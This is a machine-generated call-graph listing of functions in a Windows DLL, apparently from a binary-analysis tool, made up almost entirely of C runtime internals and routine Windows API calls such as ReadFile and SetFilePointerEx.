14835->14836 14836->14829 14839 6fe6a12f __vfwprintf_l 14 API calls 14839->14840 14840->14835 14842 6fe6c3ce __DllMainCRTStartup@12 29 API calls 14841->14842 14850 6fe6a735 __vfwprintf_l __DllMainCRTStartup@12 14842->14850 14843 6fe68322 14843->14839 14844 6fe6de7c __vfwprintf_l 29 API calls 14844->14843 14845 6fe6a740 14845->14844 14848 6fe6c320 __vfwprintf_l 39 API calls 14848->14850 14850->14843 14850->14845 14850->14848 14851 6fe6a844 14850->14851 14855 6fe6a379 14850->14855 14858 6fe6ad98 14850->14858 14892 6fe6b3bd 14850->14892 14852 6fe6de7c __vfwprintf_l 29 API calls 14851->14852 14853 6fe6a85e 14852->14853 14854 6fe6de7c __vfwprintf_l 29 API calls 14853->14854 14854->14843 14921 6fe6887c 14855->14921 14857 6fe6a3b4 14857->14850 14859 6fe6adb6 14858->14859 14860 6fe6ad9f 14858->14860 14863 6fe6de7c __vfwprintf_l 29 API calls 14859->14863 14875 6fe6adf5 14859->14875 14861 6fe6b442 14860->14861 14862 6fe6b3e2 14860->14862 14860->14875 14864 6fe6b447 14861->14864 14865 6fe6b47b 14861->14865 14866 6fe6b468 14862->14866 14867 6fe6b3e8 14862->14867 14868 6fe6adea 14863->14868 14869 6fe6b474 14864->14869 14870 6fe6b449 14864->14870 14871 6fe6b480 14865->14871 14872 6fe6b498 14865->14872 14958 6fe6939b 14866->14958 14878 6fe6b439 14867->14878 14879 6fe6b3ed 14867->14879 14868->14850 14965 6fe6c124 14869->14965 14881 6fe6b458 14870->14881 14882 6fe6b3fc 14870->14882 14871->14866 14871->14878 14890 6fe6b413 __vfwprintf_l __DllMainCRTStartup@12 14871->14890 14969 6fe6c15e 14872->14969 14875->14850 14891 6fe6b4a1 __DllMainCRTStartup@12 14878->14891 14951 6fe696ba 14878->14951 14879->14882 14883 6fe6b426 14879->14883 14879->14890 14881->14866 14885 6fe6b45c 14881->14885 14882->14891 14937 6fe6bc2a 14882->14937 14883->14891 14947 6fe6bf62 14883->14947 14887 6fe6c09f __vfwprintf_l 29 API calls 14885->14887 14885->14891 14886 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14888 6fe6b71a 14886->14888 14887->14890 14888->14850 14890->14891 14972 6fe710e1 14890->14972 14891->14886 14893 6fe6b442 14892->14893 14894 6fe6b3e2 14892->14894 14895 6fe6b447 14893->14895 14896 6fe6b47b 14893->14896 14897 6fe6b468 14894->14897 14898 6fe6b3e8 14894->14898 14899 6fe6b474 14895->14899 14900 6fe6b449 14895->14900 14901 6fe6b480 14896->14901 14902 6fe6b498 14896->14902 14906 6fe6939b __vfwprintf_l 30 API calls 14897->14906 14908 6fe6b439 14898->14908 14909 6fe6b3ed 14898->14909 14903 6fe6c124 __vfwprintf_l 30 API calls 14899->14903 14904 6fe6b3fc 14900->14904 14911 6fe6b458 14900->14911 14901->14897 14901->14908 14919 6fe6b413 __vfwprintf_l __DllMainCRTStartup@12 14901->14919 14905 6fe6c15e __vfwprintf_l 30 API calls 14902->14905 14903->14919 14907 6fe6bc2a __vfwprintf_l 42 API calls 14904->14907 14920 6fe6b4a1 __DllMainCRTStartup@12 14904->14920 14905->14919 14906->14919 14907->14919 14910 6fe696ba __vfwprintf_l 30 API calls 14908->14910 14908->14920 14909->14904 14912 6fe6b426 14909->14912 14909->14919 14910->14919 14911->14897 14913 6fe6b45c 14911->14913 14914 6fe6bf62 __vfwprintf_l 41 API calls 14912->14914 14912->14920 14916 6fe6c09f __vfwprintf_l 29 API calls 14913->14916 14913->14920 14914->14919 14915 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14917 6fe6b71a 14915->14917 14916->14919 14917->14850 14918 6fe710e1 __vfwprintf_l 41 API calls 14918->14919 14919->14918 14919->14920 14920->14915 14922 6fe6c37b __vfwprintf_l 39 API calls 14921->14922 14924 6fe6888e 14922->14924 14923 6fe688a3 14925 6fe6de7c __vfwprintf_l 29 API calls 14923->14925 14924->14923 14926 6fe688d6 14924->14926 14930 6fe688be __vfwprintf_l 14924->14930 14925->14930 14927 6fe6896d 14926->14927 14931 6fe6c2c5 14926->14931 14928 6fe6c2c5 __vfwprintf_l 39 API calls 14927->14928 14928->14930 14930->14857 14932 6fe6c2d6 14931->14932 14933 6fe6c2ea 14931->14933 14932->14933 14934 6fe70431 __dosmaperr 14 API calls 14932->14934 14933->14927 14935 6fe6c2df 14934->14935 14936 6fe6def9 ___std_exception_copy 39 API calls 14935->14936 14936->14933 14938 6fe6bc44 14937->14938 14939 6fe686ab __vfwprintf_l 15 API calls 14938->14939 14940 6fe6bc83 __vfwprintf_l 14939->14940 14941 6fe70f60 __vfwprintf_l 41 API calls 14940->14941 14942 6fe6bd16 14941->14942 14943 6fe6c320 __vfwprintf_l 39 API calls 14942->14943 14944 6fe6bd3a __vfwprintf_l 14942->14944 14943->14944 14945 6fe6c320 __vfwprintf_l 39 API calls 14944->14945 14946 6fe6bd6d __vfwprintf_l 14944->14946 14945->14946 14946->14890 14946->14946 14948 6fe6bf7d __vfwprintf_l 14947->14948 14949 6fe6bfb3 14948->14949 14950 6fe710e1 __vfwprintf_l 41 API calls 14948->14950 14949->14890 14950->14949 14952 6fe696cf __vfwprintf_l 14951->14952 14953 6fe696f1 14952->14953 14955 6fe69718 14952->14955 14954 6fe6de7c __vfwprintf_l 29 API calls 14953->14954 14957 6fe6970e __vfwprintf_l 14954->14957 14956 6fe686ab __vfwprintf_l 15 API calls 14955->14956 14955->14957 14956->14957 14957->14890 14959 6fe693b0 __vfwprintf_l 14958->14959 14960 6fe693d2 14959->14960 14962 6fe693f9 14959->14962 14961 6fe6de7c __vfwprintf_l 29 API calls 14960->14961 14964 6fe693ef __vfwprintf_l 14961->14964 14963 6fe686ab __vfwprintf_l 15 API calls 14962->14963 14962->14964 14963->14964 14964->14890 14966 6fe6c130 14965->14966 14982 6fe6907c 14966->14982 14968 6fe6c140 14968->14890 14970 6fe696ba __vfwprintf_l 30 API calls 14969->14970 14971 6fe6c173 14970->14971 14971->14890 14973 6fe710f6 14972->14973 14975 6fe6c320 __vfwprintf_l 39 API calls 14973->14975 14976 6fe71137 14973->14976 14979 6fe71123 __fread_nolock 14973->14979 14980 6fe710fa __fread_nolock __vfwprintf_l 14973->14980 14974 6fe6de7c __vfwprintf_l 29 API calls 14974->14980 14975->14976 14976->14979 14976->14980 14989 6fe74945 14976->14989 14978 6fe711f2 14978->14980 14981 6fe71208 GetLastError 14978->14981 14979->14974 14979->14980 14980->14890 14981->14979 14981->14980 14983 6fe69091 __vfwprintf_l 14982->14983 14984 6fe690da 14983->14984 14985 6fe690b3 14983->14985 14987 6fe686ab __vfwprintf_l 15 API calls 14984->14987 14988 6fe690d0 __vfwprintf_l 14984->14988 14986 6fe6de7c __vfwprintf_l 29 API calls 14985->14986 14986->14988 14987->14988 14988->14968 14990 6fe74958 __vfwprintf_l 14989->14990 14991 6fe74996 WideCharToMultiByte 14990->14991 14991->14978 15003 6fe63c50 14992->15003 14996 6fe638df __DllMainCRTStartup@12 15002 6fe63905 __DllMainCRTStartup@12 14996->15002 15010 6fe63c2b 14996->15010 15000 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15001 6fe633db 15000->15001 15001->13898 15002->15000 15004 6fe63c6b __DllMainCRTStartup@12 15003->15004 15005 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15004->15005 15006 6fe638d5 15005->15006 15006->14996 15007 6fe6142c 15006->15007 15018 6fe648b3 15007->15018 15011 6fe63c50 __DllMainCRTStartup@12 5 API calls 15010->15011 15012 6fe63c3a 15011->15012 15047 6fe63d08 15012->15047 15015 6fe63f56 15051 6fe640a1 15015->15051 15023 6fe64801 15018->15023 15022 6fe648d2 15029 6fe647b1 15023->15029 15026 6fe66486 15027 6fe664cd RaiseException 15026->15027 15028 6fe664a0 15026->15028 15027->15022 15028->15027 15032 6fe65b7e 15029->15032 15033 6fe647dd 15032->15033 15034 6fe65b8b ___std_exception_copy 15032->15034 15033->15026 15034->15033 15035 6fe65bb8 15034->15035 15038 6fe6ed88 15034->15038 15037 6fe6d5ab ___std_exception_destroy 14 API calls 15035->15037 15037->15033 15039 6fe6ed96 15038->15039 15040 6fe6eda4 15038->15040 15039->15040 15045 6fe6edbc 15039->15045 15041 6fe70431 __dosmaperr 14 API calls 15040->15041 15042 6fe6edac 15041->15042 15044 6fe6def9 ___std_exception_copy 39 API calls 15042->15044 15043 6fe6edb6 15043->15035 15044->15043 15045->15043 15046 6fe70431 __dosmaperr 14 API calls 15045->15046 15046->15042 15048 6fe63d29 __DllMainCRTStartup@12 15047->15048 15049 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15048->15049 15050 6fe63966 15049->15050 15050->15015 15054 6fe640b3 15051->15054 15059 6fe640fa 15054->15059 15060 6fe64113 15059->15060 15061 6fe640c2 15059->15061 15069 6fe61339 15060->15069 15063 6fe640ce 15061->15063 15064 6fe640e5 15063->15064 15065 6fe640da 15063->15065 15067 6fe63f70 15064->15067 15081 6fe6139b 15064->15081 15073 6fe6411f 15065->15073 15067->15002 15070 6fe61347 __DllMainCRTStartup@12 15069->15070 15071 6fe66486 _com_raise_error RaiseException 15070->15071 15072 6fe61355 15071->15072 15072->15061 15074 6fe64136 15073->15074 15075 6fe6413b 15073->15075 15076 6fe61339 __DllMainCRTStartup@12 RaiseException 15074->15076 15077 6fe6139b __DllMainCRTStartup@12 3 API calls 15075->15077 15076->15075 15079 6fe64143 15077->15079 15080 6fe6415c 15079->15080 15084 6fe6df09 15079->15084 15080->15067 15095 6fe64ae8 15081->15095 15089 6fe6de45 15084->15089 15087 6fe6df26 __vfwprintf_l 11 API calls 15088 6fe6df25 15087->15088 15090 6fe6de57 __vfwprintf_l 15089->15090 15091 6fe6de7c __vfwprintf_l 29 API calls 15090->15091 15092 6fe6de6f 15091->15092 15093 6fe67d4e __vfwprintf_l 39 API calls 15092->15093 15094 6fe6de7a 15093->15094 15094->15087 15096 6fe64aed ___std_exception_copy 15095->15096 15097 6fe613a6 15096->15097 15098 6fe6df8f __dosmaperr 2 API calls 15096->15098 15100 6fe64b09 __DllMainCRTStartup@12 15096->15100 15097->15067 15098->15096 15099 6fe6501f __DllMainCRTStartup@12 15101 6fe66486 _com_raise_error RaiseException 15099->15101 15100->15099 15102 6fe66486 _com_raise_error RaiseException 15100->15102 15103 6fe6503c 15101->15103 15102->15099 15105 6fe63ccb __DllMainCRTStartup@12 15104->15105 15108 6fe63d6a 15105->15108 15107 6fe63ce2 15107->13955 15113 6fe63f02 15108->15113 15112 6fe63db1 __DllMainCRTStartup@12 15112->15107 15114 6fe63f14 15113->15114 15115 6fe63d7e 15113->15115 15130 6fe63f1d 15114->15130 15115->15112 15117 6fe63f85 15115->15117 15118 6fe63c50 __DllMainCRTStartup@12 5 API calls 15117->15118 15119 6fe63faf 15118->15119 15120 6fe63fbc 15119->15120 15121 6fe6142c __DllMainCRTStartup@12 40 API calls 15119->15121 15122 6fe63c2b __DllMainCRTStartup@12 5 API calls 15120->15122 15121->15120 15123 6fe63fd9 __DllMainCRTStartup@12 15122->15123 15124 6fe63f56 __DllMainCRTStartup@12 40 API calls 15123->15124 15125 6fe63ff3 __DllMainCRTStartup@12 15124->15125 15128 6fe6405b __DllMainCRTStartup@12 15125->15128 15141 6fe6377a 15125->15141 15127 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15129 6fe6409d 15127->15129 15128->15127 15129->15112 15133 6fe648d3 15130->15133 15138 6fe64856 15133->15138 15136 6fe66486 _com_raise_error RaiseException 15137 6fe648f2 15136->15137 15139 6fe647b1 std::exception::exception 39 API calls 15138->15139 15140 6fe64868 15139->15140 15140->15136 15144 6fe63839 15141->15144 15147 6fe63bd2 15144->15147 15146 6fe637ac 15146->15128 15148 6fe63bfd 15147->15148 15149 6fe63c0a __DllMainCRTStartup@12 15147->15149 15151 6fe613a9 15148->15151 15149->15146 15152 6fe613e5 15151->15152 15153 6fe6df09 __DllMainCRTStartup@12 39 API calls 15152->15153 15154 6fe61400 15152->15154 15153->15152 15154->15149 15157 6fe634e1 __DllMainCRTStartup@12 15155->15157 15156 6fe63525 __DllMainCRTStartup@12 15156->13959 15157->15156 15158 6fe6377a __DllMainCRTStartup@12 39 API calls 15157->15158 15158->15156 15160 6fe632aa __DllMainCRTStartup@12 15159->15160 15163 6fe6359b 15160->15163 15162 6fe632be 15162->13898 15164 6fe635f4 15163->15164 15166 6fe635af __DllMainCRTStartup@12 15163->15166 15167 6fe63ae0 15164->15167 15166->15162 15168 6fe63c50 __DllMainCRTStartup@12 5 API calls 15167->15168 15169 6fe63afb 15168->15169 15170 6fe63b05 15169->15170 15171 6fe6142c __DllMainCRTStartup@12 40 API calls 15169->15171 15172 6fe63c2b __DllMainCRTStartup@12 5 API calls 15170->15172 15171->15170 15173 6fe63b19 __DllMainCRTStartup@12 15172->15173 15174 6fe63f56 __DllMainCRTStartup@12 40 API calls 15173->15174 15175 6fe63b33 __DllMainCRTStartup@12 15174->15175 15176 6fe6377a __DllMainCRTStartup@12 39 API calls 15175->15176 15177 6fe63b80 __DllMainCRTStartup@12 15175->15177 15176->15177 15178 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15177->15178 15179 6fe63ba8 15178->15179 15179->15166 15181 6fe610df __vfwprintf_l 15180->15181 15218 6fe610a2 15181->15218 15185 6fe63421 __DllMainCRTStartup@12 15184->15185 15428 6fe639e9 15185->15428 15188 6fe623ce 15189 6fe623f4 __DllMainCRTStartup@12 15188->15189 15190 6fe6240b ExpandEnvironmentStringsW 15189->15190 15191 6fe6329b __DllMainCRTStartup@12 40 API calls 15190->15191 15192 6fe62421 15191->15192 15193 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15192->15193 15194 6fe6242e 15193->15194 15195 6fe61654 VariantInit 15194->15195 15195->13980 15196->13984 15197->13987 15198->13989 15199->13993 15200->13995 15201->13997 15219 6fe610b6 __vfwprintf_l 15218->15219 15222 6fe6c687 15219->15222 15223 6fe6c69b __vfwprintf_l 15222->15223 15224 6fe6c6bd 15223->15224 15226 6fe6c6e4 15223->15226 15225 6fe6de7c __vfwprintf_l 29 API calls 15224->15225 15227 6fe6c6d8 15225->15227 15231 6fe681ef 15226->15231 15229 6fe67d4e __vfwprintf_l 39 API calls 15227->15229 15230 6fe610c0 15229->15230 15230->13978 15232 6fe681fb __FrameHandler3::FrameUnwindToState 15231->15232 15239 6fe6cc7d RtlEnterCriticalSection 15232->15239 15234 6fe68209 15240 6fe6a16d 15234->15240 15239->15234 15254 6fe713fe 15240->15254 15242 6fe6a194 __vfwprintf_l 15261 6fe6a46b 15242->15261 15245 6fe6a12f __vfwprintf_l 14 API calls 15246 6fe6a1e8 15245->15246 15276 6fe714a9 15246->15276 15249 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15280 6fe713c0 15254->15280 15256 6fe7140f __vfwprintf_l 15257 6fe71471 15256->15257 15258 6fe7047e __fread_nolock 15 API calls 15256->15258 15257->15242 15259 6fe71468 15258->15259 15260 6fe70444 ___free_lconv_mon 14 API calls 15259->15260 15260->15257 15303 6fe6c396 15261->15303 15264 6fe6a491 15265 6fe6de7c __vfwprintf_l 29 API calls 15264->15265 15266 6fe6a1db 15265->15266 15266->15245 15268 6fe6a4b9 __vfwprintf_l 15268->15266 15270 6fe6c320 __vfwprintf_l 39 API calls 15268->15270 15271 6fe6a379 __vfwprintf_l 39 API calls 15268->15271 15272 6fe6a6ad 15268->15272 15309 6fe6ac3f 15268->15309 15343 6fe6b07b 15268->15343 15270->15268 15271->15268 15273 6fe6de7c __vfwprintf_l 29 API calls 15272->15273 15274 6fe6a6c7 15273->15274 15275 6fe6de7c __vfwprintf_l 29 API calls 15274->15275 15275->15266 15277 6fe6a1f5 15276->15277 15278 6fe714b4 15276->15278 15277->15249 15278->15277 15380 6fe71d58 15278->15380 15281 6fe713cc __vfwprintf_l 15280->15281 15282 6fe713f6 15281->15282 15287 6fe6eea2 15281->15287 15282->15256 15284 6fe713e7 15294 6fe75a73 15284->15294 15286 6fe713ed 15286->15256 15288 6fe6eec3 15287->15288 15289 6fe6eeae 15287->15289 15288->15284 15290 6fe70431 __dosmaperr 14 API calls 15289->15290 15291 6fe6eeb3 15290->15291 15292 6fe6def9 ___std_exception_copy 39 API calls 15291->15292 15293 6fe6eebe 15292->15293 15293->15284 15295 6fe75a80 15294->15295 15296 6fe75a8d 15294->15296 15297 6fe70431 __dosmaperr 14 API calls 15295->15297 15299 6fe75a99 15296->15299 15300 6fe70431 __dosmaperr 14 API calls 15296->15300 15298 6fe75a85 15297->15298 15298->15286 15299->15286 15301 6fe75aba 15300->15301 15302 6fe6def9 ___std_exception_copy 39 API calls 15301->15302 15302->15298 15304 6fe6c3c3 15303->15304 15305 6fe6c3a1 15303->15305 15372 6fe6c3ff 15304->15372 15306 6fe6de7c __vfwprintf_l 29 API calls 15305->15306 15308 6fe6a486 15306->15308 15308->15264 15308->15266 15308->15268 15310 6fe6ac46 15309->15310 15311 6fe6ac5d 15309->15311 15313 6fe6b09f 15310->15313 15314 6fe6b10b 15310->15314 15320 6fe6ac9c 15310->15320 15312 6fe6de7c __vfwprintf_l 29 API calls 15311->15312 15311->15320 15315 6fe6ac91 15312->15315 15316 6fe6b0a5 15313->15316 15317 6fe6b133 15313->15317 15318 6fe6b110 15314->15318 15319 6fe6b14a 15314->15319 15315->15268 15329 6fe6b0aa 15316->15329 15330 6fe6b100 15316->15330 15327 6fe6939b __vfwprintf_l 30 API calls 15317->15327 15321 6fe6b112 15318->15321 15322 6fe6b141 15318->15322 15323 6fe6b14f 15319->15323 15324 6fe6b169 15319->15324 15320->15268 15323->15317 15323->15330 15344 6fe6b09f 15343->15344 15345 6fe6b10b 15343->15345 15346 6fe6b0a5 15344->15346 15347 6fe6b133 15344->15347 15348 6fe6b110 15345->15348 15349 6fe6b14a 15345->15349 15357 6fe6b0aa 15346->15357 15358 6fe6b100 15346->15358 15355 6fe6939b __vfwprintf_l 30 API calls 15347->15355 15350 6fe6b112 15348->15350 15351 6fe6b141 15348->15351 15352 6fe6b14f 15349->15352 15353 6fe6b169 15349->15353 15360 6fe6b121 15350->15360 15362 6fe6b0b9 15350->15362 15352->15347 15352->15358 15357->15362 15360->15347 15373 6fe6c413 15372->15373 15374 6fe6c47d 15372->15374 15375 6fe6eea2 __fread_nolock 39 API calls 15373->15375 15374->15308 15376 6fe6c41a 15375->15376 15376->15374 15377 6fe70431 __dosmaperr 14 API calls 15376->15377 15378 6fe6c472 15377->15378 15379 6fe6def9 ___std_exception_copy 39 API calls 15378->15379 15379->15374 15429 6fe63c50 __DllMainCRTStartup@12 5 API calls 15428->15429 15430 6fe63a0a 15429->15430 15431 6fe6142c __DllMainCRTStartup@12 40 API calls 15430->15431 15432 6fe63a14 __DllMainCRTStartup@12 15430->15432 15431->15432 15433 6fe63c2b __DllMainCRTStartup@12 5 API calls 15432->15433 15438 6fe63a3a __DllMainCRTStartup@12 15432->15438 15434 6fe63a7c 15433->15434 15435 6fe63f56 __DllMainCRTStartup@12 40 API calls 15434->15435 15435->15438 15436 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15437 6fe62500 15436->15437 15437->15188 15438->15436 15459 6fe6cd68 15458->15459 15460 6fe6cd79 15458->15460 15461 6fe70431 __dosmaperr 14 API calls 15459->15461 15501 6fe6cca5 15460->15501 15464 6fe6cd6d 15461->15464 15466 6fe6def9 ___std_exception_copy 39 API calls 15464->15466 15465 6fe62032 15465->14231 15468 6fe6d1e0 15465->15468 15466->15465 15467 6fe70431 __dosmaperr 14 API calls 15467->15465 15469 6fe6d1f3 __vfwprintf_l 15468->15469 15557 6fe6cf71 15469->15557 15472 6fe67d4e __vfwprintf_l 39 API calls 15473 6fe6204b 15472->15473 15474 6fe681bf 15473->15474 15475 6fe681d2 __vfwprintf_l 15474->15475 15617 6fe67ab3 15475->15617 15478 6fe67d4e __vfwprintf_l 39 API calls 15479 6fe62056 15478->15479 15480 6fe6cec7 15479->15480 15481 6fe6ceda __vfwprintf_l 15480->15481 15687 6fe6cda2 15481->15687 15483 6fe6cee6 15484 6fe67d4e __vfwprintf_l 39 API calls 15483->15484 15485 6fe62062 15484->15485 15485->14240 15763 6fe6dbb6 15486->15763 15490 6fe6cb21 __vfwprintf_l __DllMainCRTStartup@12 15489->15490 15901 6fe6c7ee 15490->15901 15502 6fe6ccb1 __FrameHandler3::FrameUnwindToState 15501->15502 15503 6fe6ccb8 15502->15503 15506 6fe6ccda 15502->15506 15504 6fe70431 __dosmaperr 14 API calls 15503->15504 15505 6fe6ccbd 15504->15505 15507 6fe6def9 ___std_exception_copy 39 API calls 15505->15507 15508 6fe6ccdf 15506->15508 15509 6fe6ccec 15506->15509 15510 6fe6ccc8 15507->15510 15511 6fe70431 __dosmaperr 14 API calls 15508->15511 15518 6fe71e6f 15509->15518 15510->15465 15510->15467 15511->15510 15514 6fe6ccfb 15516 6fe70431 __dosmaperr 14 API calls 15514->15516 15515 6fe6cd08 __DllMainCRTStartup@12 15526 6fe6cd44 15515->15526 15516->15510 15519 6fe71e7b __FrameHandler3::FrameUnwindToState 15518->15519 15530 6fe7351f RtlEnterCriticalSection 15519->15530 15521 6fe71e89 15531 6fe71f13 15521->15531 15527 6fe6cd48 __DllMainCRTStartup@12 15526->15527 15556 6fe6cc91 RtlLeaveCriticalSection 15527->15556 15529 6fe6cd59 15529->15510 15530->15521 15540 6fe71f36 15531->15540 15532 6fe71f8e 15533 6fe71658 __dosmaperr 14 API calls 15532->15533 15534 6fe71f97 15533->15534 15536 6fe70444 ___free_lconv_mon 14 API calls 15534->15536 15537 6fe71fa0 15536->15537 15539 6fe71e96 15537->15539 15549 6fe719b1 15537->15549 15544 6fe71ecf 15539->15544 15540->15532 15540->15539 15547 6fe6cc7d RtlEnterCriticalSection 15540->15547 15548 6fe6cc91 RtlLeaveCriticalSection 15540->15548 15555 6fe73567 RtlLeaveCriticalSection 15544->15555 15546 6fe6ccf5 15546->15514 15546->15515 15547->15540 15548->15540 15550 6fe717ce __dosmaperr 5 API calls 15549->15550 15551 6fe719cd 15550->15551 15552 6fe719eb InitializeCriticalSectionAndSpinCount 15551->15552 15553 6fe719d6 15551->15553 15552->15553 15554 6fe6cc7d RtlEnterCriticalSection 15553->15554 15554->15539 15555->15546 15556->15529 15559 6fe6cf7d __FrameHandler3::FrameUnwindToState 15557->15559 15558 6fe6cf83 15560 6fe6de7c __vfwprintf_l 29 API calls 15558->15560 15559->15558 15562 6fe6cfc6 15559->15562 15561 6fe6cf9e 15560->15561 15561->15472 15568 6fe6cc7d RtlEnterCriticalSection 15562->15568 15564 6fe6cfd2 15569 6fe6d0f4 15564->15569 15566 6fe6cfe8 15578 6fe6d011 15566->15578 15568->15564 15570 6fe6d107 15569->15570 15571 6fe6d11a 15569->15571 15570->15566 15581 6fe6d01b 15571->15581 15573 6fe6d1cb 15573->15566 15574 6fe6d13d __DllMainCRTStartup@12 15574->15573 15575 6fe71d58 __vfwprintf_l 64 API calls 15574->15575 15576 6fe6d16b 15575->15576 15585 6fe6f10f 15576->15585 15616 6fe6cc91 RtlLeaveCriticalSection 15578->15616 15580 6fe6d019 15580->15561 15582 6fe6d02c 15581->15582 15584 6fe6d084 __DllMainCRTStartup@12 15581->15584 15582->15584 15588 6fe6f0cf 15582->15588 15584->15574 15586 6fe6efee __wsopen_s 41 API calls 15585->15586 15587 6fe6f128 15586->15587 15587->15573 15589 6fe6f0e3 __vfwprintf_l 15588->15589 15594 6fe6efee 15589->15594 15591 6fe6f0f8 15592 6fe67d4e __vfwprintf_l 39 API calls 15591->15592 15593 6fe6f107 15592->15593 15593->15584 15600 6fe752de 15594->15600 15596 6fe6f000 15597 6fe6f01c SetFilePointerEx 15596->15597 15599 6fe6f008 __wsopen_s 15596->15599 15598 6fe6f034 GetLastError 15597->15598 15597->15599 15598->15599 15599->15591 15601 6fe752eb 15600->15601 15603 6fe75300 15600->15603 15613 6fe7041e 15601->15613 15605 6fe7041e __dosmaperr 14 API calls 15603->15605 15607 6fe75325 15603->15607 15608 6fe75330 15605->15608 15606 6fe70431 __dosmaperr 14 API calls 15609 6fe752f8 15606->15609 15607->15596 15610 6fe70431 __dosmaperr 14 API calls 15608->15610 15609->15596 15611 6fe75338 15610->15611 15612 6fe6def9 ___std_exception_copy 39 API calls 15611->15612 15612->15609 15614 6fe6f5e8 __dosmaperr 14 API calls 15613->15614 15615 6fe70423 15614->15615 15615->15606 15616->15580 15618 6fe67abf __FrameHandler3::FrameUnwindToState 15617->15618 15619 6fe67ac6 15618->15619 15620 6fe67ae7 15618->15620 15621 6fe6de7c __vfwprintf_l 29 API calls 15619->15621 15628 6fe6cc7d RtlEnterCriticalSection 15620->15628 15623 6fe67adf 15621->15623 15623->15478 15624 6fe67af2 15629 6fe67b33 15624->15629 15628->15624 15635 6fe67b65 15629->15635 15631 6fe67b01 15632 6fe67b29 15631->15632 15686 6fe6cc91 RtlLeaveCriticalSection 15632->15686 15634 6fe67b31 15634->15623 15636 6fe67b74 15635->15636 15637 6fe67b9c 15635->15637 15638 6fe6de7c __vfwprintf_l 29 API calls 15636->15638 15639 6fe6eea2 __fread_nolock 39 API calls 15637->15639 15645 6fe67b8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15638->15645 15640 6fe67ba5 15639->15640 15648 6fe6f0b1 15640->15648 15643 6fe67c4f 15651 6fe67f55 15643->15651 15645->15631 15646 6fe67c66 __DllMainCRTStartup@12 15646->15645 15663 6fe67d8a 15646->15663 15670 6fe6eec9 15648->15670 15652 6fe67f64 __wsopen_s 15651->15652 15653 6fe6eea2 __fread_nolock 39 API calls 15652->15653 15654 6fe67f80 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15653->15654 15656 6fe6f0b1 __DllMainCRTStartup@12 43 API calls 15654->15656 15662 6fe67f8c 15654->15662 15655 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15657 6fe680fe 15655->15657 15658 6fe67fe0 15656->15658 15657->15645 15659 6fe68012 ReadFile 15658->15659 15658->15662 15660 6fe68039 15659->15660 15659->15662 15661 6fe6f0b1 __DllMainCRTStartup@12 43 API calls 15660->15661 15661->15662 15662->15655 15664 6fe6eea2 __fread_nolock 39 API calls 15663->15664 15665 6fe67d9d 15664->15665 15666 6fe67de7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 15665->15666 15667 6fe6f0b1 __DllMainCRTStartup@12 43 API calls 15665->15667 15666->15645 15668 6fe67e44 15667->15668 15668->15666 15669 6fe6f0b1 __DllMainCRTStartup@12 43 API calls 15668->15669 15669->15666 15671 6fe6eed5 __FrameHandler3::FrameUnwindToState 15670->15671 15672 6fe6ef18 15671->15672 15674 6fe6ef5e 15671->15674 15680 6fe67bc3 15671->15680 15673 6fe6de7c __vfwprintf_l 29 API calls 15672->15673 15673->15680 15681 6fe75062 RtlEnterCriticalSection 15674->15681 15676 6fe6ef64 15677 6fe6ef85 15676->15677 15678 6fe6efee __wsopen_s 41 API calls 15676->15678 15682 6fe6efe6 15677->15682 15678->15677 15680->15643 15680->15645 15680->15646 15681->15676 15685 6fe75117 RtlLeaveCriticalSection 15682->15685 15684 6fe6efec 15684->15680 15685->15684 15686->15634 15688 6fe6cdae __FrameHandler3::FrameUnwindToState 15687->15688 15689 6fe6cddb 15688->15689 15690 6fe6cdb8 15688->15690 15697 6fe6cdd3 __DllMainCRTStartup@12 15689->15697 15698 6fe6cc7d RtlEnterCriticalSection 15689->15698 15691 6fe6de7c __vfwprintf_l 29 API calls 15690->15691 15691->15697 15693 6fe6cdf9 15699 6fe6ce39 15693->15699 15695 6fe6ce06 15713 6fe6ce31 15695->15713 15697->15483 15698->15693 15700 6fe6ce46 15699->15700 15701 6fe6ce69 15699->15701 15702 6fe6de7c __vfwprintf_l 29 API calls 15700->15702 15703 6fe6ce61 __DllMainCRTStartup@12 15701->15703 15704 6fe71d58 __vfwprintf_l 64 API calls 15701->15704 15702->15703 15703->15695 15705 6fe6ce81 15704->15705 15716 6fe71e2f 15705->15716 15708 6fe6eea2 __fread_nolock 39 API calls 15709 6fe6ce95 15708->15709 15720 6fe72473 15709->15720 15712 6fe70444 ___free_lconv_mon 14 API calls 15712->15703 15762 6fe6cc91 RtlLeaveCriticalSection 15713->15762 15715 6fe6ce37 15715->15697 15717 6fe71e46 15716->15717 15718 6fe6ce89 15716->15718 15717->15718 15719 6fe70444 ___free_lconv_mon 14 API calls 15717->15719 15718->15708 15719->15718 15721 6fe7249c 15720->15721 15726 6fe6ce9c 15720->15726 15722 6fe724eb 15721->15722 15724 6fe724c3 15721->15724 15723 6fe6de7c __vfwprintf_l 29 API calls 15722->15723 15723->15726 15727 6fe723e2 15724->15727 15726->15703 15726->15712 15728 6fe723ee __FrameHandler3::FrameUnwindToState 15727->15728 15735 6fe75062 RtlEnterCriticalSection 15728->15735 15762->15715 15764 6fe6dbc2 __FrameHandler3::FrameUnwindToState 15763->15764 15765 6fe6dbd5 __fread_nolock 15764->15765 15766 6fe6dc0c 15764->15766 15775 6fe6dbb1 15764->15775 15768 6fe70431 __dosmaperr 14 API calls 15765->15768 15776 6fe6cc7d 